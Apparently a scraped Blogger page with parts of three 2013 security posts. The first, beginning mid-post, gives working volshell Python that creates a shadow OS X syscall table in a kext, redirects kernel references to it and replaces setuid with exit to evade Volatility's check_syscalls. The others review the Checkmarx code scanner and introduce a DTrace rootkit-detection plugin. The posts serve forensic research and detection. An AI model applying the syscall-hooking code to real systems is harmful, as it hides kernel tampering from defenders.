<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMvv3zxTiM-srsx8h52zpmzm1u2J0eaV_SSImdgvFCjWHPWUN4Q9GuHhxdrxSko3MVQfDLKCY4UoqkqTmN1cyTHS9EOGYRzLXVfU-f-JPi64biw6dRe9xYHaFHaNtQh3SsZjiQJHNNPJq/s1088/before-after-dis-inlined.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="33" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMvv3zxTiM-srsx8h52zpmzm1u2J0eaV_SSImdgvFCjWHPWUN4Q9GuHhxdrxSko3MVQfDLKCY4UoqkqTmN1cyTHS9EOGYRzLXVfU-f-JPi64biw6dRe9xYHaFHaNtQh3SsZjiQJHNNPJq/s320/before-after-dis-inlined.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">setuid function prologue before and after modification</td></tr>
</tbody></table>
<br />
I also took screenshots of a '<a href="http://www.opensource.apple.com/source/sudo/sudo-17/sudo/sudo.c" target="_blank">sudo</a> -i' attempt before and after the function modification. Before the modification the system prompts for a password, but after the modification there is no such prompt since the call to setuid becomes a call to exit.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK5buvOvHaqlJQVTgXRJSnhLUBHPffVQ4lWVmxxTsbaLrQJbNZIWK1_B4ytdHjigaG9r2wnyEYVr-AoCYB1u93CvsTFNo-FMSt3S-ym_ZtjiMi-SkJ9ABVrKCC62Mpr1C2lpAK7CttyvtH/s1076/before-after-inlined.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="29" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK5buvOvHaqlJQVTgXRJSnhLUBHPffVQ4lWVmxxTsbaLrQJbNZIWK1_B4ytdHjigaG9r2wnyEYVr-AoCYB1u93CvsTFNo-FMSt3S-ym_ZtjiMi-SkJ9ABVrKCC62Mpr1C2lpAK7CttyvtH/s320/before-after-inlined.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">sudo -i execution attempts before and after setuid modification</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
This type of function interception is also not detected by Volatility's <a href="https://code.google.com/p/volatility/wiki/MacCommandReference23#mac_check_syscalls" target="_blank">mac_check_syscalls plugin</a>.<br />
<h2>
Patched Syscall Handler or Shadow Syscall Table</h2>
The shadowing of the syscall table is a technique that hides the attacker's modifications to the syscall table by creating a copy of it to modify and by keeping the original untouched. The attacker would need to alter all kernel references to the syscall table to point to the shadow syscall table for the attack to fully succeed. After the references are modified, the attacker can perform the syscall function interceptions described above without worrying much about detection.<br />
<br />
To perform the described attack in Volatility, I had to do the following:<br />
<ol>
<li>Find a suitable kernel extension (kext) that has enough free space to copy the syscall table into</li>
<li>Add a new segment to the binary and modify the segment count in the header (<a href="https://developer.apple.com/library/mac/#documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html" target="_blank">mach-o format</a>)</li>
<li>Copy the syscall table into the segment's data</li>
<li>Modify kernel references to the syscall table to point to the shadow syscall table</li>
<li>Modify the shadow syscall table using the first technique described</li>
</ol>
<div>
Finding a suitable kext was pretty much a trial and error for me. In my case "com.vmware.kext.vmhgfs" appeared to be a stable target.<br />
<br />
To find the kernel references to the syscall table (sysent) I first looked into the <a href="http://www.opensource.apple.com/source/xnu/xnu-2050.22.13/bsd/dev/i386/systemcalls.c" target="_blank">XNU source code</a> to find the functions that have references to it. The function unix_syscall64 appeared to be a good candidate since it had several references:<br />
<br />
<pre><span style="font-size: x-small;">...
callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
uargp = (void *)(&regs->rdi)
if (__improbable(callp == sysent)) {
/*
* indirect system call... system call number
* passed as 'arg0'
*/
code = regs->rdi;
callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
uargp = (void *)(&regs->rsi);
args_in_regs = 5;
}
...</span>
</pre>
<br />
Then I disassembled the unix_syscall64 function in volshell to find the corresponding instructions so I could get the pointer to the syscall table. Since I knew the syscall table address, it was easy to find the references to it.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqBwq1GdrG3xxA-mSguXyhdl_vJLbkgEG4XhJqCOlzV6xFfuMH68vzQ530A2CgYdCivjVMaodmbjapY_I5gpZxL5K0zNl3Z2-4KmtxILl5ZB5tx_pZ2ZxvhNp6QwEgPJmKqaxYJyF5eBpM/s1104/Screen+Shot+2013-07-02+at+10.36.56+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqBwq1GdrG3xxA-mSguXyhdl_vJLbkgEG4XhJqCOlzV6xFfuMH68vzQ530A2CgYdCivjVMaodmbjapY_I5gpZxL5K0zNl3Z2-4KmtxILl5ZB5tx_pZ2ZxvhNp6QwEgPJmKqaxYJyF5eBpM/s320/Screen+Shot+2013-07-02+at+10.36.56+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">unix_syscall64 references to the syscall table</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
To get the reference to the syscall table I ran the following code in volshell:</div>
<div>
<br /></div>
<div>
<pre><span style="font-size: x-small;">>>> tgt_addr = self.addrspace.profile.get_symbol("_unix_syscall64")
>>> buf = self.addrspace.read(tgt_addr, 200)
>>> for op in distorm3.Decompose(tgt_addr, buf, distorm3.Decode64Bits):
... #targeting the instruction: CMP R13, [RIP+0x21fc16]
... if op.mnemonic == "CMP" and 'FLAG_RIP_RELATIVE' in op.flags and op.operands[0].name == "R13":
... print "Syscall Table Reference is at {0:#10x}".format(op.address + op.operands[1].disp + op.size)
... break
...
Syscall Table Reference is at <b>0xffffff802ec000d0</b></span>
</pre>
</div>
<div>
<br /></div>
It appears that unix_syscall_return, unix_syscall64, unix_syscall, and some dtrace functions have references to the syscall table as well so all we have to do is replace what the reference is pointing to with the shadow syscall table's address.<br />
<br />
To create the shadow syscall table I ran the following code in volshell, which performs the steps mentioned above:<br />
<br />
<pre><span style="font-size: x-small;">#get address for the kernel extension (kext) list
p = self.addrspace.profile.get_symbol("_kmod")
kmodaddr = obj.Object("Pointer", offset = p, vm = self.addrspace)
kmod = kmodaddr.dereference_as("kmod_info")
#loop thru list to find suitable target to place the shadow syscall table in
while kmod.is_valid():
str(kmod.name)
if str(kmod.name) == "com.vmware.kext.vmhgfs":
mh = obj.Object('mach_header_64', offset = kmod.address,vm = self.addrspace)
o = mh.obj_offset
#skip header data
o += 32
seg_data_end = 0
#loop thru segments to find the end to use as the start of the injected segment
for i in xrange(0, mh.ncmds):
seg = obj.Object('segment_command_64', offset = o, vm = self.addrspace)
o += seg.cmdsize
print "index {0} segname {1} cmd {2:x} offset {3:x} header cnt addr {4}".format(i,seg.segname, seg.cmd, o, mh.ncmds.obj_offset)
#increment header segment count
self.addrspace.write(mh.ncmds.obj_offset, chr(mh.ncmds + 1))
#create new segment starting at last segment's end
print "Creating new segment at {0:#10x}".format(o)
seg = obj.Object('segment_command_64', offset = o, vm = self.addrspace)
#create a segment with the type LC_SEGMENT_64, 0x19
seg.cmd = 0x19
seg.cmdsize = 0
#naming the segment __SHSYSCALL
status = self.addrspace.write(seg.segname.obj_offset, '\x5f\x5f\x53\x48\x53\x59\x53\x43\x41\x4c\x4c')
#data/shadow syscall table will start after the command struct
seg.vmaddr = o + self.addrspace.profile.get_obj_size('segment_command_64')
seg.filesize = seg.vmsize
seg.fileoff = 0
seg.nsects = 0
#copy syscall table entries to new location
nsysent = obj.Object("int", offset = self.addrspace.profile.get_symbol("_nsysent"), vm = self.addrspace)
seg.vmsize = self.addrspace.profile.get_obj_size('sysent') * nsysent
sysents = obj.Object(theType = "Array", offset = self.addrspace.profile.get_symbol("_sysent"), vm = self.addrspace, count = nsysent, targetType = "sysent")
for (i, sysent) in enumerate(sysents):
status = self.addrspace.write(seg.vmaddr + (i*40), self.addrspace.read(sysent.obj_offset, 40))
print "The shadow syscall table is at {0:#10x}".format(seg.vmaddr)
break
kmod = kmod.next</span>
</pre>
<br />
While the volshell code might not be the cleanest, it worked for this proof of concept.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRDrM_ccJTeQKBC4M7tsOh29jdb59EVilCPECt22W-pKpAosyFlrvxVVU7O2mZNhPwhPWm79YrCRowjenwp-ObHj95NAfZ7dJDfTN65_S0WJazXOV2eRblegb22FW0TTHMpP4BBgI-X8b8/s1334/Screen+Shot+2013-07-02+at+11.45.51+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRDrM_ccJTeQKBC4M7tsOh29jdb59EVilCPECt22W-pKpAosyFlrvxVVU7O2mZNhPwhPWm79YrCRowjenwp-ObHj95NAfZ7dJDfTN65_S0WJazXOV2eRblegb22FW0TTHMpP4BBgI-X8b8/s320/Screen+Shot+2013-07-02+at+11.45.51+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">output from the syscall table copy code</td></tr>
</tbody></table>
Now that the syscall table reference and shadow syscall table are available, the reference can be modified.<br />
<br />
<pre><span style="font-size: x-small;">>>> #write shadow table address (0xffffff7fafdf5350) to reference (0xffffff802ec000d0)
>>> self.addrspace.write(0xffffff802ec000d0, struct.pack('Q', 0xffffff7fafdf5350))
True
>>> "{0:#10x}".format(obj.Object('Pointer', offset =0xffffff802ec000d0, vm = self.addrspace))
'0xffffff7fafdf5350'</span></pre>
<pre><span style="font-size: x-small;">
</span></pre>
The second command confirms that the syscall table reference no longer points to the original one besides the VM still being up and running.<br />
<br />
The last step of this method is to modify the shadow syscall table using the first method described (direct syscall table modification).<br />
<br />
<pre><span style="font-size: x-small;">>>> #get sysent addresses for exit and setuid
>>> nsysent = obj.Object("int", offset = self.addrspace.profile.get_symbol("_nsysent"), vm = self.addrspace)
>>> sysents = obj.Object(theType = "Array", offset = </span><span style="font-size: x-small;"><b>0xffffff7fafdf5350</b></span><span style="font-size: x-small;">, vm = self.addrspace, count = nsysent, targetType = "sysent")</span>
<span style="font-size: x-small;">>>> for (i, sysent) in enumerate(sysents):
... if str(self.addrspace.profile.get_symbol_by_address("kernel",sysent.sy_call.v())) == "_setuid":
... "setuid sysent at {0:#10x}".format(sysent.obj_offset)
... "setuid syscall {0:#10x}".format(sysent.sy_call.v())
... if str(self.addrspace.profile.get_symbol_by_address("kernel",sysent.sy_call.v())) == "_exit":
... "exit sysent at {0:#10x}".format(sysent.obj_offset)
... "exit syscall {0:#10x}".format(sysent.sy_call.v())
...
'exit sysent at 0xffffff7fafdf5378'
'exit syscall 0xffffff802e955430'
'setuid sysent at 0xffffff7fafdf56e8'
'setuid syscall 0xffffff802e960910'
>>> #create sysent objects
>>> s_exit = obj.Object('sysent',offset=</span><span style="font-size: x-small;"> 0xffffff7fafdf5378</span><span style="font-size: x-small;">,vm=self.addrspace)</span>
<span style="font-size: x-small;">>>> s_setuid = obj.Object('sysent',offset=</span><span style="font-size: x-small;"> 0xffffff7fafdf56e8</span><span style="font-size: x-small;">,vm=self.addrspace)</span>
<span style="font-size: x-small;">>>> #write exit function address to setuid function address
>>> self.addrspace.write(s_setuid.sy_call.obj_offset, struct.pack("<Q", s_exit.sy_call.v()))
True</span></pre>
<div>
<span style="font-size: x-small;"><br /></span></div>
As seen in the screenshot below, after the modification, sudo -i exits without prompting for a password at the target VM, but Volatility's check_syscalls plugin still shows the syscall table as unmodified.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9GS7aZzJRf7zAGkSajAyyN_5tuaI86Jm02oVD4PQbIrw4gd-LH1zBm6lYw0a_FAHHLE3CimaRGUfAfHVizB8R3ZT7vdhvl0V7b_gwABRw1v3bUyJLBX96K8d8HDUelYlCZFGGVAO7q-CK/s436/Screen+Shot+2013-07-03+at+12.33.07+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9GS7aZzJRf7zAGkSajAyyN_5tuaI86Jm02oVD4PQbIrw4gd-LH1zBm6lYw0a_FAHHLE3CimaRGUfAfHVizB8R3ZT7vdhvl0V7b_gwABRw1v3bUyJLBX96K8d8HDUelYlCZFGGVAO7q-CK/s200/Screen+Shot+2013-07-03+at+12.33.07+AM.png" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">sudo -i doesn't prompt for password</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2-RfidfOCY_-VOu5kJ1zywHupGef67ToyGmD3FCkEbKqxTsDAmOsis4eWa7G1Zo2N7bupvGA4xyX4Oxk4f_T3FWufUbmjb4-37Gat8UtNOM0yvW92fVUstWbHkSpejX1BlXCANYK1QSkM/s760/Screen+Shot+2013-07-03+at+12.34.24+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2-RfidfOCY_-VOu5kJ1zywHupGef67ToyGmD3FCkEbKqxTsDAmOsis4eWa7G1Zo2N7bupvGA4xyX4Oxk4f_T3FWufUbmjb4-37Gat8UtNOM0yvW92fVUstWbHkSpejX1BlXCANYK1QSkM/s320/Screen+Shot+2013-07-03+at+12.34.24+AM.png" width="316" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">check_syscall plugin showing unmodified syscall table</td></tr>
</tbody></table>
<br />
Note: It looks like the writes to the vmem file can take a bit to take effect.<br />
<h2>
Conclusion</h2>
<div>
I have gone through three examples that show how to mess with the OS X syscall table using the Volatility Framework. This exercise has shown that Volatility can be used to develop proof of concept attacks besides detecting them. Although currently the presented attacks are undetected by Volatility, this will change shortly with my <a href="http://siliconblade.blogspot.com/2013/07/back-to-defense-finding-hooks-in-os-x.html" target="_blank">next blog post</a>, which will reveal a <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py" target="_blank">new plugin</a>. Stay tuned! </div>
<div>
<br /></div>
<div>
<br /></div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-83252126204847026052013-06-26T09:04:00.000-07:002013-07-22T20:06:36.789-07:00Automated Secure Code Review Anyone?<h2>
Summary</h2>
Imagine you are given the source code for a JAVA web application with about a million lines and were asked to review the code for any vulnerabilities and report back in a week. This can turn into an interesting exercise if you are a team of one. What are your options: crowdsource, ask for mercy, do your best? Thankfully there are other options, such as automated code review software. In this post I'll talk about <a href="http://www.checkmarx.com/" target="_blank">Checkmarx</a>'s <a href="http://lp.checkmarx.com/cxcloud-v1/" target="_blank">cloud based</a> solution that does security code analysis and use <a href="https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project" target="_blank">OWASP's WebGoat</a> (v5.4) project to see how it measures up.<br />
<br />
<a name='more'></a><br />
<h2>
The Role of Automated Code Review Software</h2>
Generally speaking automated source code analysis is used to assess compliance based on a predefined set of rules or best practices. The analysis tool may provide the means for team collaboration and suggestions to fix the issues detected. The detected flaws may be displayed in a developer friendly interface quite similar to popular <a href="http://en.wikipedia.org/wiki/Integrated_development_environment" target="_blank">IDEs</a>. Most tools use <a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" target="_blank">OWASP 10</a> and <a href="http://www.sans.org/top25-software-errors/" target="_blank">SANS Top 25</a> as benchmarks for application security flaws when performing their audits. Using a documentation tool, such as <a href="http://www.doxygen.org/" target="_blank">Doxygen</a> to view the general structure and call graphs will provide and better understanding when tracking the issues detected by the analysis tool. As with any automated security solutions, an analyst should expect to have false positives in the results and be ready to eliminate them. Also the analyst should keep in mind that business logic flaws or insecure use of software libraries will not be detected by these automated tools.<br />
<h2>
Looking at Checkmarx CxCloud On Demand</h2>
Checkmarx's web/cloud based secure code analysis solution <a href="http://www.checkmarx.com/technology/supported-coding-languages/" target="_blank">provides analysis</a> for JAVA, C#, PHP, C, C++, Visual Basic 6.0, VB.NET, Flash, APEX, Ruby, JavaScript, Perl, Objective C, PL/SQL, HTML5 source code so it should be able to handle WebGoat without any issues. CheckMarx also is able to <a href="http://www.checkmarx.com/technology/vulnerability-coverage/" target="_blank">detect</a> OWASP Top 10 vulnerabilities and other high risk flaws, which is great for this test run.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh7LXkwXctvA38ASQvMyBhyphenhyphenWljPe8uYFPFdgk28oz12lpX9RdsRXiJn5VDHeB7nD0IZcNGpOZAdSeAW7CN_3GWa62i6QZInpr76-9ze4Oz5DhamTaiwTZIhvzTPpZYjxx4NpQx_myPqL_q/s1600/Screen+Shot+2013-06-26+at+11.53.49+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh7LXkwXctvA38ASQvMyBhyphenhyphenWljPe8uYFPFdgk28oz12lpX9RdsRXiJn5VDHeB7nD0IZcNGpOZAdSeAW7CN_3GWa62i6QZInpr76-9ze4Oz5DhamTaiwTZIhvzTPpZYjxx4NpQx_myPqL_q/s320/Screen+Shot+2013-06-26+at+11.53.49+AM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">OWASP WebGoat UI</td></tr>
</tbody></table>
After signing up for a <a href="http://lp.checkmarx.com/cxcloud-v1/" target="_blank">free trial account</a>, which supports the audit of applications up to 50K lines of code, we can easily create a project and upload the zipped war file.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKsa-phsYNZ1_4y1XgIX6KE5X8OeM5dzeByLtnoAn6Qsxn6ZEhJ_4DFCPNfZRGr4mVkNXLJueygBKtuQ-bmq8041ZerlAnq-iiGpkK35Nd6CDpGXrbn_YEPKF58IxZsnET4xmfGgKABd52/s1600/Screen+Shot+2013-06-25+at+2.34.19+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKsa-phsYNZ1_4y1XgIX6KE5X8OeM5dzeByLtnoAn6Qsxn6ZEhJ_4DFCPNfZRGr4mVkNXLJueygBKtuQ-bmq8041ZerlAnq-iiGpkK35Nd6CDpGXrbn_YEPKF58IxZsnET4xmfGgKABd52/s1600/Screen+Shot+2013-06-25+at+2.34.19+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Define Parameters and Upload Code</td></tr>
</tbody></table>
<br />
The upload and analysis of WebGoat took about 15 minutes and can vary depending connectivity and the load on the analysis system though theoretically load shouldn't be an issue since this is a scalable cloud based solution. At first glance it appears that the application is at 100% risk, with 514 high risk flaws, surprise!<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_rZ-P8PPu14ugz7zCEHBznCnIVy8faqo00zMOx7tkjm9gpql9hPaiow_hDK7zqsTxNk-OrmjMKGtc3mgubSRGUBRRnvD38MaQRllbEGN5Kqxyb0eLij01-GtWSxH-BFhbI34NXS80f9bP/s1600/Screen+Shot+2013-06-25+at+3.07.58+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_rZ-P8PPu14ugz7zCEHBznCnIVy8faqo00zMOx7tkjm9gpql9hPaiow_hDK7zqsTxNk-OrmjMKGtc3mgubSRGUBRRnvD38MaQRllbEGN5Kqxyb0eLij01-GtWSxH-BFhbI34NXS80f9bP/s1600/Screen+Shot+2013-06-25+at+3.07.58+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Dashboard</td></tr>
</tbody></table>
<br />
The breakdown of these flaws suggests that the application has a problem with input validation since the high risk vulnerabilities are mostly composed of <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" target="_blank">XSS</a>, <a href="https://www.owasp.org/index.php/SQL_Injection" target="_blank">SQL injection</a>, and other injection type vulnerabilities. Not surprisingly medium risk vulnerabilities include <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" target="_blank">XSRF</a>, <a href="https://www.owasp.org/index.php/Web_Parameter_Tampering" target="_blank">parameter tampering</a>, and more XSS.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh985wnLZaMDajUP-WzQBhXzRWIxjb42RyhPoZqU267IM8ud0wwe_jLGD-j_BwsOQtpgAEiaIcUMTZyVq-NgtxczBclx7QQP4LHv1f_Cba85tX7No0OH_AajVul8RTPi58jm5j-iYasR585/s1600/Screen+Shot+2013-06-25+at+3.20.44+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh985wnLZaMDajUP-WzQBhXzRWIxjb42RyhPoZqU267IM8ud0wwe_jLGD-j_BwsOQtpgAEiaIcUMTZyVq-NgtxczBclx7QQP4LHv1f_Cba85tX7No0OH_AajVul8RTPi58jm5j-iYasR585/s1600/Screen+Shot+2013-06-25+at+3.20.44+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Scan Summary</td></tr>
</tbody></table>
<br />
Drilling down on these reported issues can be accomplished by clicking on the "Open Code Viewer" button and this takes the analyst to the IDE like drill down view. The UI shows the code with the vulnerability at the bottom pane and the associated chain of code under the "Attack Vector" section, which saves time while eliminating false positives. To mark a finding as false positive, the analyst only has to check the box of the item in the "Results Table" and change its result state to "not exploitable." One shortcoming of this view is that it can't show the use of a vulnerable class in other classes of the application so an analyst needs to manually scan for the reuse of this code.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi95oaYPszCfRhDRWy2-Go_wAs1QGpKP5V-aoozLgf2FhyphenhyphenI-SFb9nWEUR6orK5fHCwxSinzw3tm4wXGxHWVTOv10LygcDQZGU5acAV12Qiy_VbCKjimoKjlh5_G4ZtYXYvDaMjkioVxjAT-/s1600/Screen+Shot+2013-06-25+at+3.21.24+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi95oaYPszCfRhDRWy2-Go_wAs1QGpKP5V-aoozLgf2FhyphenhyphenI-SFb9nWEUR6orK5fHCwxSinzw3tm4wXGxHWVTOv10LygcDQZGU5acAV12Qiy_VbCKjimoKjlh5_G4ZtYXYvDaMjkioVxjAT-/s1600/Screen+Shot+2013-06-25+at+3.21.24+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Code Viewer</td></tr>
</tbody></table>
<span style="font-family: inherit;">One great feature of
this view is that the ‘Flow Chart’ tab will track the use of the vulnerable
class and function across all other classes and let see the actual extent of
the problem.<!--EndFragment--> </span><br />
<div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWfuMOzVpZsj9b_F6hrd1ksua4x1cHfYAGDUUAtsj9EpVeocnCjS49MDHZW4dUdHizF-ttuMS6c8Y2gTQgv4ugUfkO3d9v5B46r6F9XiXlhbfYEZU42DWUhsmdqYxyMl-44RsPxhzc97vl/s1600/Screen+Shot+2013-06-26+at+11.30.15+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWfuMOzVpZsj9b_F6hrd1ksua4x1cHfYAGDUUAtsj9EpVeocnCjS49MDHZW4dUdHizF-ttuMS6c8Y2gTQgv4ugUfkO3d9v5B46r6F9XiXlhbfYEZU42DWUhsmdqYxyMl-44RsPxhzc97vl/s320/Screen+Shot+2013-06-26+at+11.30.15+AM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Flow Chart View</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
So how does it measure up on an easy target as WebGoat? It depends... WebGoat has both real and simulated vulnerabilities and this makes it difficult to evaluate the findings. Also some vulnerabilities, such as 'Forgot Password' are business logic flaws that can't be detected by the analysis tool.<br />
<br />
On the other hand, Checkmarx CxCloud definitely shines in detecting XSS, SQL injection, various other injections, parameter tampering, hard coded credentials, application configuration issues, bad crypto usage, and session mismanagement. <br />
<h2>
Conclusion</h2>
<div>
<div style="text-align: left;">
</div>
Checkmarx CxCloud, with its slick UI, intuitive drilldown views and inclusion of security best practices, is a great help for developers that want to integrate security into their <a href="http://en.wikipedia.org/wiki/Systems_development_life-cycle" target="_blank">SDLC</a>. It will find the most of the trivial vulnerabilities and sometimes surprise you by tracking down a manually hard to trace rouge code. The <a href="http://lp.checkmarx.com/cxcloud-v1/" target="_blank">free trial account</a> is easy to setup and use. So all you have to keep in mind while using this tool is that business logic flaws could always be lurking behind the scenes and that manual inspection of the code is always necessary.</div>
</div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-83093690785886644962013-05-13T14:13:00.002-07:002013-06-26T09:16:40.271-07:00check_dtrace - A Volatility Plugin Arises<h2>
Summary</h2>
After reading through fG!'s <a href="http://reverse.put.as/wp-content/uploads/2013/05/SysScan-13-Presentation.pdf" target="_blank">presentation</a> on OS X rootkits I decided to look into some other D-Trace providers, such as fbt and mach_trap to close the loop on the D-Trace topic. While this endeavor didn't start with the intention of building a plugin, I decided to do so to save time for myself and possibly others (and of course have some fun!).<br />
<h2>
<a name='more'></a></h2>
<h2>
Some OS X D-Trace providers</h2>
<div>
The D-Trace fbt provider has probes for almost <i>all</i> <i>kernel functions</i>, and is generally more useful when monitoring a particular behavior or issue in a specific kernel subsystem. This provider is very sensitive about OS versions so it requires some knowledge of OS internals.<br />
<br />
The syscall provider, on the other hand, let's you monitor the entry point into the kernel from applications in userland and is not very OS specific. While the syscall provider dynamically rewrites the syscall table, the fbt provider manipulates the stack to transfer the control to the <a href="http://wiki.osdev.org/Interrupt_Descriptor_Table" target="_blank">IDT</a> handler, which transfers the control to the D-Trace probe, which in turn emulates the replaced instruction.<br />
<br />
The mach_trap probes fire on entry or return of the specified Mach library function. Nemo uses this provider to hide processes from ps and the Activity Monitor in his <a href="http://felinemenace.org/~nemo/dtrace-infiltrate.pdf" target="_blank">presentation</a>.<br />
<br />
You can find a full list of providers at the <a href="http://developer.apple.com/library/ios/#documentation/DeveloperTools/Conceptual/InstrumentsUserGuide/CreatingCustomInstruments/CreatingCustomInstruments.html" target="_blank">Apple site</a>, but I'll be focusing on the three providers mentioned above.</div>
<div>
<h2>
Analysis </h2>
</div>
<div>
This time instead of collecting memory samples, I <a href="http://blogs.vmware.com/kb/2013/04/installing-mac-os-x-10-8-mountain-lion-as-a-guest-operating-system-in-vmware-fusion-5.html" target="_blank">created an OS X VM</a> using VMWare Fusion to do some live analysis since the Volatility Framework can work with vmem files. Creating a VM is pretty straight forward if you have the OS X installer app handy. To run a Volatility command on a vmem file:<br />
<br />
<pre>$ python vol.py mac_check_dtrace -f ~/Documents/Virtual\ Machines/Mac\ OS\ X\ 10.8\ 64-bit.vmwarevm/563d899c-18ee-3dc2-0fec-60b3b62d2b34.vmem --profile=MacMountainLion_10_8_3_AMDx64
</pre>
<br />
I already had talked about finding syscall probes in my <a href="http://siliconblade.blogspot.com/2013/04/hunting-d-trace-rootkits-with.html" target="_blank">previous post</a> so I'll skip that. The mach_trap probe announces its presence in a similar fashion to a syscall probe by replacing a trap table entry with a '_dtrace_machtrace_syscall' entry, thus making it easy to detect using the Volatility plugin check_trap_table:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
